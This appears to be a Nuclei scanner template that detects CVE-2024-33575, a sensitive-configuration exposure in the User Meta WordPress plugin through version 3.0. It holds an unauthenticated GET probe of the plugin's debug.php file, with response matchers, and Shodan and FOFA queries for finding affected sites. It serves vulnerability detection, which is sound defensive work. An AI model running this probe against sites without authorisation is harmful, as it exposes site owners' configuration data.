Description
The User Meta is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.0 via the /views/debug.php file. This makes it possible for unauthenticated attackers, with to extract sensitive configuration data.
The User Meta is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.0 via the /views/debug.php file. This makes it possible for unauthenticated attackers, with to extract sensitive configuration data.
id: CVE-2024-33575
info:
name: User Meta WP Plugin < 3.1 - Sensitive Information Exposure
author: s4e-io
severity: medium
description: |
The User Meta is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.0 via the /views/debug.php file. This makes it possible for unauthenticated attackers, with to extract sensitive configuration data.
impact: |
Unauthenticated attackers can extract sensitive configuration data from the User Meta plugin.
remediation: |
Update User Meta plugin to version 3.1 or later.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-33575
- https://wpscan.com/vulnerability/3b75549c-3fc5-4e6f-84ae-264d8276bfb3/
- https://patchstack.com/database/vulnerability/user-meta/wordpress-user-meta-plugin-3-0-sensitive-data-exposure-vulnerability?_s_id=cve
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2024-33575
cwe-id: CWE-200
epss-score: 0.01121
epss-percentile: 0.64545
metadata:
max-request: 1
vendor: "User Meta"
product: "User Meta"
framework: wordpress
shodan-query: "http.html:/wp-content/plugins/user-meta/"
fofa-query: "body=/wp-content/plugins/user-meta/"
publicwww-query: "/wp-content/plugins/user-meta/"
tags: wpscan,cve,cve2024,user-meta,wordpress,wp-plugin,info-leak,User Meta,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/user-meta/views/debug.php"
matchers:
- type: dsl
dsl:
- "status_code == 200"
- 'contains(body, "um-debug<br/>")'
condition: and
# digest: 4a0a0047304502207f5d6f35521a4b51371e6bcc12c34e38252e05106cd735a525408b31060556e5022100ea4d74cdea90557ecf1f11edd08d0baefc37b0511d15ef5dd41d16e5aa4ad813:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.